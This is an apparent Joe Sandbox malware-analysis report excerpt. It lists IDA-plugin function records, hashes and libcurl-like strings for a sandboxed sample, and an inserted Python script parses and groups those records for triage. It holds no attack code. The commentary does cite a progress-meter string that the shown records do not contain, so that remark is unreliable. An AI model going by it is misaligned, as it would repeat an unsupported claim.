• Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $.$;$?$?$xn--$xn--
                                                              • API String ID: 0-543057197
                                                              • Opcode ID: 1317621c75425ab1bb40acb7082b07e659ba6c1fc51b94205509d20b42478ed3
                                                              • Instruction ID: 1c15d535ab20c5ad940fe2804c29cd0956f31976f56139179a27d627ffd44e4c
                                                              • Opcode Fuzzy Hash: 1317621c75425ab1bb40acb7082b07e659ba6c1fc51b94205509d20b42478ed3
                                                              • Instruction Fuzzy Hash: 4022F4B2A043019BEB209A249C41B6B77D5AF9434EF08593CFC99B7292E775DD08C792
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
• Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              • Opcode ID: 2a603176b8f8e45df1b9a66ee1b0ee8362ab60a180aa59c8845634657f15168c
                                                              • Instruction ID: da37e076ad1974ee0ed042ef52a20a561a11ffe6e832dac20f109f837bc1d0b7
                                                              • Opcode Fuzzy Hash: 2a603176b8f8e45df1b9a66ee1b0ee8362ab60a180aa59c8845634657f15168c
                                                              • Instruction Fuzzy Hash: 25C280316083418FCB14CF28D59066AB7E2FFC9724F1A892EE8D99B355D730ED458B92
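The function records above all follow one fixed layout (a "Memory Dump Source" block, then a "Similarity" block whose "String ID" joins the referenced strings with "$" and whose "API String ID" is a pair of hashes over the API list and the string list). Two of the records below carry the same API String ID (0-2555271450) with different Opcode IDs, which is exactly the pivot an analyst wants when triaging a large report: which functions share a string set, and which call a named API. The following parser is an added example written for this page; it is not part of Joe Sandbox or the IDA plugin. The sample text is a constructed excerpt of four records copied from this report, and the code assumes that "$" is the only separator in "String ID" (a string that itself contains "$", such as the "$d$nil)" entry, cannot be split unambiguously and is left as the naive split).

```python
"""Parse Joe Sandbox 'Similarity' records and pivot on shared string sets."""
import re
from collections import defaultdict

# Constructed sample: four records copied from the report above, trimmed to the
# fields this script reads. "Download File" is link residue from the HTML export.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
• Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
Similarity
• API ID:
• String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
• API String ID: 0-3977460686
• Opcode ID: 1776dc354b5fb26eed3b7411167a71e70f5e6190951a990d63f6496866bb052e
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
Similarity
• API ID: localeconv
• String ID: $d$nil)
• API String ID: 3737801528-394766432
• Opcode ID: 8675dc9eee094748c4626a9fc2096272c89d872ba534ef789e5e76b9ee8e84a0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
Similarity
• API ID:
• String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
• API String ID: 0-2555271450
• Opcode ID: 2a603176b8f8e45df1b9a66ee1b0ee8362ab60a180aa59c8845634657f15168c
Strings
Memory Dump Source
• Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
Similarity
• API ID:
• String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
• API String ID: 0-2555271450
• Opcode ID: 038fe0cf92820b06aac31e2ebe3b5420047e3b7f160f956847781d7553ed3eba
"""

FIELD = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")   # "• Key: value" bullet lines
RESIDUE = re.compile(r"Download File$")             # link text left by the HTML export


def parse_records(text):
    """Split report text into one dict per function record.

    A new record starts at each "Memory Dump Source" heading; every bullet that
    follows is stored under its key, with "Associated" dumps collected as a list."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {"Associated": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = FIELD.match(line)
        if not m:
            continue
        key, val = m.group(1), RESIDUE.sub("", m.group(2)).strip()
        if key == "Associated":
            cur["Associated"].append(val)
        else:
            cur[key] = val
    return records


def strings_of(record):
    """Strings referenced by a record. Assumption: the report joins them with '$';
    a string containing '$' (e.g. '$d$nil)') is therefore split naively, not guessed."""
    sid = record.get("String ID", "")
    return sid.split("$") if sid else []


def shared_string_sets(records):
    """Map API String ID -> Opcode IDs of every function with that exact
    API/string fingerprint, keeping only fingerprints used by more than one function."""
    groups = defaultdict(list)
    for r in records:
        if r.get("API String ID") and r.get("Opcode ID"):
            groups[r["API String ID"]].append(r["Opcode ID"])
    return {k: v for k, v in groups.items() if len(v) > 1}


def functions_with_api(records, api_name):
    """Opcode IDs of functions whose resolved API list names api_name."""
    out = []
    for r in records:
        apis = [a for a in r.get("API ID", "").split("$") if a]
        if api_name in apis:
            out.append(r["Opcode ID"])
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records parsed")
    for sid, funcs in shared_string_sets(recs).items():
        print("fingerprint", sid, "shared by", len(funcs), "functions")
    print("localeconv callers:", functions_with_api(recs, "localeconv"))
```

Run against the full report text, the shared-fingerprint map shows which functions are near-duplicates (inlined copies of the same routine, or the same library compiled twice), and the API pivot narrows a few thousand records to the handful that touch an API of interest. Strings such as "urlapi.c" and the "% Total % Received % Xferd" progress-meter line in the records above are recognisably libcurl's, so grouping by fingerprint also helps separate statically linked library code from the sample's own logic.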
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
• Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              • Opcode ID: 038fe0cf92820b06aac31e2ebe3b5420047e3b7f160f956847781d7553ed3eba
                                                              • Instruction ID: dd7c1626b5671fe9c8b222239eb72f1ac93f0a36edc80765e6694cbca9eded03
                                                              • Opcode Fuzzy Hash: 038fe0cf92820b06aac31e2ebe3b5420047e3b7f160f956847781d7553ed3eba
                                                              • Instruction Fuzzy Hash: 62826F71A083419FDB14CF28C88476BB7E1AFD5724F188A2DF9A997391D730DC458BA2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: default$login$macdef$machine$netrc.c$password
                                                              • API String ID: 0-1043775505
                                                              • Opcode ID: bc06e52e454c005e1edde635374c55e8761e6639a7ceffad226894d717cc3c4b
                                                              • Instruction ID: 21a371cb27b6c2771df00782a5301c40a3d9afee1aad95a3962698a1647b4360
                                                              • Opcode Fuzzy Hash: bc06e52e454c005e1edde635374c55e8761e6639a7ceffad226894d717cc3c4b
                                                              • Instruction Fuzzy Hash: 3EE1037090C349ABE7119E218845B3B7BD0AF85708F1DC42CFEC597682E3B6D94887B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                              • API String ID: 0-4201740241
                                                              • Opcode ID: 57e4ec3a4d60be7758db21ae3b1d7e5911c4748dfeec01d4d1baa2631d878810
                                                              • Instruction ID: 935582e50cc7309349cc3f3572d9b785817a3d6d915558ac4b4da44747ba93f7
                                                              • Opcode Fuzzy Hash: 57e4ec3a4d60be7758db21ae3b1d7e5911c4748dfeec01d4d1baa2631d878810
                                                              • Instruction Fuzzy Hash: F362F1B0914741DBD714CF24C4907AAB3E4FF98304F05962EE98D8B352E774EA94CBA6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                                              • API String ID: 0-2839762339
                                                              • Opcode ID: 08fc109643d4bfa48426de272247fdfed34dc6fc4e50db349a05e84fef277574
                                                              • Instruction ID: 3b3cf51e3dad19e00304d38f9e5792072092a7fc1ab9002a1fab25d0c4c9cc08
                                                              • Opcode Fuzzy Hash: 08fc109643d4bfa48426de272247fdfed34dc6fc4e50db349a05e84fef277574
                                                              • Instruction Fuzzy Hash: 4D02C6B16083429FEB2D9F298841B6BFBD4BF60754F09843CE99987249E771E804C793
                                                              APIs
                                                              • GetUnicastIpAddressTable.IPHLPAPI(?,?), ref: 00E58FE6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: AddressTableUnicast
                                                              • String ID: 127.0.0.1$::1
                                                              • API String ID: 2844252683-3302937015
                                                              • Opcode ID: 117bc8e440abb35673d14ae15d4a89cd1c7b4d3396925211edd25fedf30ad2d6
                                                              • Instruction ID: e9c05b0ec5e5b6c224cf3c4ecf1d379259dd3baf8e1b24a26e23e7f565db49a6
                                                              • Opcode Fuzzy Hash: 117bc8e440abb35673d14ae15d4a89cd1c7b4d3396925211edd25fedf30ad2d6
                                                              • Instruction Fuzzy Hash: DAA1E0B1D04342DBE300DF24D9457A6B3E0AF95304F05AA29FC88AB262F774ED94C792
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                              • API String ID: 0-3285806060
                                                              • Opcode ID: 340fbc36aa1ef0ee19c6335be38a4dfa4754d029e49fe79f14cd33e826fb6ae3
                                                              • Instruction ID: a7fb819571c4b62ad658f2649165789d0bc0b0104b97c9d1f97cbd136371880b
                                                              • Opcode Fuzzy Hash: 340fbc36aa1ef0ee19c6335be38a4dfa4754d029e49fe79f14cd33e826fb6ae3
                                                              • Instruction Fuzzy Hash: C2D10872E0A3019BD7649E28E88137AB7D1AFD1308F24993DE9C9A7281EB349D44D742
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$@$gfff$gfff
                                                              • API String ID: 0-2633265772
                                                              • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                              • Instruction ID: cd02f38b1e3c53bbe98a73921d4c62b0cb9375561c625f79b395c2aeff2e06c4
                                                              • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                              • Instruction Fuzzy Hash: D4D1A0716087168BDB18DE29C48431BFBE2AFD4244F09C93DE8898B359E774D909CBD2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$&$urlapi.c
                                                              • API String ID: 0-3891957821
                                                              • Opcode ID: f1bcc44d3f7b285f1d620fae91dded0afe2d21b2a88772062c95cf90b82acdca
                                                              • Instruction ID: fcefe027f9b1f1bf47a4192e530a09109b0175dda132d579a7d6960f30a75f1a
                                                              • Opcode Fuzzy Hash: f1bcc44d3f7b285f1d620fae91dded0afe2d21b2a88772062c95cf90b82acdca
                                                              • Instruction Fuzzy Hash: EC2298A1A08341DBEB244B249C927FB77D59F92318F1C452DE88B463C2FA3DD8588772
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $
                                                              • API String ID: 0-227171996
                                                              • Opcode ID: a39acb1d62a334b9f298ccf10cf48731bdf72c7b58e510a389ac9696c16e2641
